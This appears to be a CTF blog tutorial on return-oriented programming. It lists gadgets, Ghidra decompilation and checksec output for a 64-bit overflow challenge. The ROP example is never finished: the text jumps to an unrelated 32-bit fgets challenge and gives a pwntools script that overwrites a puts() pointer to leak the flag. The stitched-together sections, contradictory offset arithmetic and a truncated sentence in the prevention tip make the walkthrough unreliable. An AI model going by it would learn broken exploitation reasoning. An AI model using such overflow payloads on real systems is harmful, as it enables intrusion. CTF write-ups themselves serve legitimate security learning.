Stack Basics: ROP Basics

rop_basics

Introduction

ROP, or Return Oriented Programming is a powerful exploitation technique that enables a simple buffer overflow to turn into something much more powerful. It enables attackers to essentially arbitrarily run code, within the bounds of the binary.

To do so, attackers typically chain together small snippets of assembly embedded within the binary itself. These “gadgets” are stored in known places within the binary (or relative offsets if PIE is enabled).

The attacker can then “chain” together these gadgets, which involves putting various different snippets of assembly together to achieve a goal. This can lead to RCE, such as popping a shell, printing an arbitrary file on the server, or privilege escalation.

Typically, gadgets take the form of assembly that looks something like:

1
0x0000000000401209 : push rax ; add dil, dil ; loopne 0x401275 ; nop ; ret
2
0x000000000040101a : ret
3
0x0000000000401fb5 : syscall
4
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
5
0x0000000000401203 : test eax, eax ; je 0x401210 ; mov edi, 0x405088 ; jmp rax
6
0x0000000000401245 : test eax, eax ; je 0x401250 ; mov edi, 0x405088 ; jmp rax
7
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax
8
0x000000000040202a : xor byte ptr [rax], al ; add byte ptr [rax + 0x29], cl ; ret 0x8948

Some gadgets, notably syscall, pop rdi, ret, or a gadget following the structure mov QWORD PTR [REG2], REG1, ret are exceptionally useful for ROP. They allow us to make syscalls, set registers, or even write any data we want to memory.

Note (Regarding the syscall gadget)

The syscall is typically quite rare and convinently placed for many CTF challenges, but not to worry, ROP chains can be built from various different types of gadgets!

So, how exactly do these gadgets actually enable us to “chain” together code, enabling RCE?

We specifically want to focus on the gadgets that include the ret (or equivalent control-flow instruction) at the end. This redirects control back to our “chain” of gadgets by popping whatever address is next on the stack.

Are you starting to see how we can utilize this?

By overflowing our buffer and RIP to the first ROP chain like we would in a normal buffer overflow to call a function, we can instead put the address of different gadgets next. Each gadget will return at the end of the execution and move on to the next one.

In this way, we can “chain” these snippets of gadgets together for RCE!

Example

The challenge I use to showcase the various simple exploitation methods using ROP is on pwn.college, so I can’t publicly disclose the solutions.

However, I will use the binary with obfuscation to show the general ideas behind how ROP chains enable us to perform some high privilege attacks.

We’re given a binary with the following decomposition in Ghidra:

1
undefined8 main()
2
{
3
  chall();
4
  return 0;
5
}

And chall() has the following decomposition:

1
void challenge(void)
2
{
3
  ssize_t sVar1;
4
  undefined1 input_buff [124];
5
  undefined4 local_c;
6

7
  printf("Input buffer: %p.\n", input_buff);
8
  sVar1 = read(0,input_buff,0x1337);
9
  local_c = (undefined4)sVar1;
10
  return;
11
}

Pretty simple, right? This time around, we have no convinently placed read flag functions or drop shell functions. Just a vulnerable function.

So what do we do?

First off, notice the leak of our buffer location.

> checksec SAMPLE_BINARY
Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No

Particularly of note is the fgets() call for the password. Notice that the size parameter is hardcoded to 0x20, or equivalently 32 bytes. However, the buffer itself is only 16 bytes. This means we have 32 - 16 = 16 bytes of extra space that we can override the other local variables with.

Let’s take a look at the other variables. What could we override to let us see the flag? We can already see that the flag is read into a buffer and stored in memory at flag from this line:

1
pcVar1 = fgets(flag,0x30,local_18);

There is also a puts() call at the end to a variable that I renamed to target. Since this variable lies above our buffer in memory, we can override it. With this, all we need to do is override the target to our flag buffer to hijack the puts() call to print the flag!

1
puts(target);

To calculate the offset needed, we can look at the layout in memory of each variable. This is the following Ghidra result:

1
**************************************************************
2
*                          FUNCTION                          *
3
**************************************************************
4
                undefined main()
5
undefined         <UNASSIGNED>   <RETURN>
6
undefined4        Stack[0x0]:4   local_res0
7
undefined4        Stack[-0xc]:4  local_c
8
undefined4        Stack[-0x14]:4 target
9
undefined4        Stack[-0x18]:4 local_18
10
undefined1[16]    Stack[-0x28]   user_input

With user_input starting at -0x20 and ending at -0x20 - 0x8 = -0x28 relative to EIP, we want to override to target. Target begins at -0x10 and ends at -0x10 - 0x4 = -0x14. We need to write up to this point.

Thus, 0x28 - 0x14 = 0x14, so we need to write 20 bytes to get to the target, plus another four bytes of the flag buffer location.

Here is the final solve script:

1
from pwn import *
2

3
p = process("./just_do_it")
4
p.recvuntil("password.\n")
5

6
payload = b"A" * 0x14
7
payload += p32(0x804A080)
8

9
p.sendline(payload)
10
p.interactive()

Prevention

There are obviously runtime protections in place to prevent buffer overflows or limit their impact, but in order to prevent the overflow in the first place, fgets() should be used safely.

Tip (Safe Use of fgets)

Generally, the size field of fgets() should only be used with sizeof(buf) in order to clearly define the read size. This way, there is less of a possibility that

Furthermore, use of gets() should be avoided at all costs. In fact, the gets() prototype itself has been removed from <stdio.h> since C11, so it can no longer be used.

Warning (Deprecation of gets)

The gets() function has been deprecated for many years (since C99, removed C11) due to its non-bounds checking behavior. This can lead to buffer overflows and is extremely dangerous in use.